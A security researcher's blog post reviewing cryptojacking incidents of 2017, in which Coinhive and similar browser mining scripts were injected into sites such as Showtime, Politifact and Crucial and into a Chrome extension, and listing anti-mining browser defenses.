Cryptojacking: 2017 Year-End Review

In 2017, we witnessed the rise of cryptojacking malware. A common target was compromised websites and their unsuspecting visitors.

How Cryptojacking Works
How cryptojacking works illustration by the European Union Agency for Network and Information Security (ENISA).

Cryptojacking begins after Coinhive or other malicious JavaScript cryptocurrency mining scripts are embedded in a compromised website. Unsuspecting visitors then begin mining the cryptocurrency Monero (XMR) in their browser.

This process is very intensive and can use all the CPU resources of the victim’s device. This leads to higher energy usage, rapid battery drain in mobile devices, and can cause damage from overheating.

Many well-known websites were compromised in 2017 with cryptojacking malware.

Showtime Networks

Coinhive found on Showtime's website
For an entire weekend in September, subscribers of Showtime’s video streaming website, Showtime Anytime, were subjected to cryptojacking.

Back in September, I was the first to document the cryptojacking incident of CBS’ Showtime Networks’ websites. Coinhive malware was found to be present on video streaming site ShowtimeAnytime.com for three straight days.

Showtime has refused to comment as to why the code appeared on their websites. While the Coinhive code was found in a New Relic code block, the company’s spokesman denied any responsibility in the matter.

Politifact 

Politifact's website hacked to run Coinhive malware
Hackers embedded Coinhive on Politifact’s website after compromising one of their AWS servers.

On October 13, Coinhive was found on the political fact-checking website Politifact. A compromised JavaScript library was found to be injecting the cryptojacking malware. The malicious code remained on the site for at least four hours before it was removed.

In a statement provided to The Wall Street Journal, PolitiFact Executive Director Aaron Sharockman stated, “Hackers were able to install their script on the fact-checking website after discovering a misconfigured cloud-computing server.”

UFC Fight Pass

UFC Fight Pass hosting Coinhive malware
The cryptojacking of UFC’s Fight Pass website went viral on Reddit as multiple users confirmed the presence of Coinhive.

Early in November, numerous users reported the subscription video streaming service of the UFC, dubbed Fight Pass, was running cryptojacking malware. A UFC.tv customer saved a copy of the source code (above) where Coinhive was found. However, in a statement released to me (below), the UFC denied the code was ever present on their website.

UFC statement regarding cryptojacking allegations

Crucial Memory and Everlast Worldwide

Coinhive found on the website of Crucial Memory

Coinhive on Everlast's website
The cryptojacking of Crucial Memory and Everlast’s website was due a compromised live help chat widget.

On Thanksgiving Day, I found a large cryptojacking campaign of 1,400+ websites. The two most nobables sites were of Crucial Memory and Everlast Worldwide. Normally you would never associate these two brands together,  however both their websites shared a similar embedded code — a live chat widget provided by LiveHelpNow. LiveHelpNow stated one of their CDN servers was compromised and injected with the cryptojacking malware Coinhive.

Globovisión and Movistar

Google Tag Manager was used to inject Coinhive on Globovision's website

Google Tag Manager was used to inject Coinhive on Movistar's website
Google Tag Manager was used to inject Coinhive on Movistar’s and Globovisión website.

In two separate incidents, I found Coinhive was injected into the websites of Globovisión and Movistar using Google Tag Manager. Movistar stated that Coinhive was not put on their website by a hacker, but instead was due to “an internal error” while they were conducting “pre-production tests.” No statement was provided by Globovisión on why the cryptojacking malware appeared on their site on November 15.

Chrome extension “Archive Poster”

Archive Poster Chrome extension infected with cryptojacking malware
Multiple users reported the cryptojacking behavior of the “Archive Poster” extension.

Cryptojacking was not limited to websites in 2017 as we saw Chrome extensions also being affected. One such extension, Archive Poster, remained on the Chrome Web Store for days while silently cryptojacking an unknown portion of their 100,000+ users.

Despite multiple user reports, Google’s response lacked any initiative to remove the malware infected extension. After I reported the issue to them, it was finally pulled.

Other sources of cryptojacking found

Coinhive is not the only the JavaScript cryptocurrency miner available for use. Many clones have popped up in its wake. Using PublicWWW, I was able to find how many websites were using a copycat.

JavaScript cryptocurrency miners
Non-Coinhive JavaScript cryptocurrency miners found on 2017-12-24.

One of the up-and-coming Coinhive knockoffs, Minr, offers built-in obfuscation and uses multiple domain names to evade detection.

Domains used by Minr malware change frequently.

Other notable cryptojacking malware discoveries in 2017

— Being found on nearly 2,500 ecommerce websites
— Masquerading as a jQuery file on 4,000 websites
— Concealed with hidden browser window mining
— Even a Starbucks WiFi provider was found running Coinhive

Heading into 2018, the question remains how to stop the spread of cryptojacking malware. Luckily we have seen anti-mining browser extensions, such as No Coin and MinerBlock, developed to help curb the threat. Another popular ad blocker, uBlock Origin, blocks most cryptojacking scripts now as well. Many anti-malware applications, such as Malwarebytes, have started blocking the effects of cryptojacking.

Leave a Reply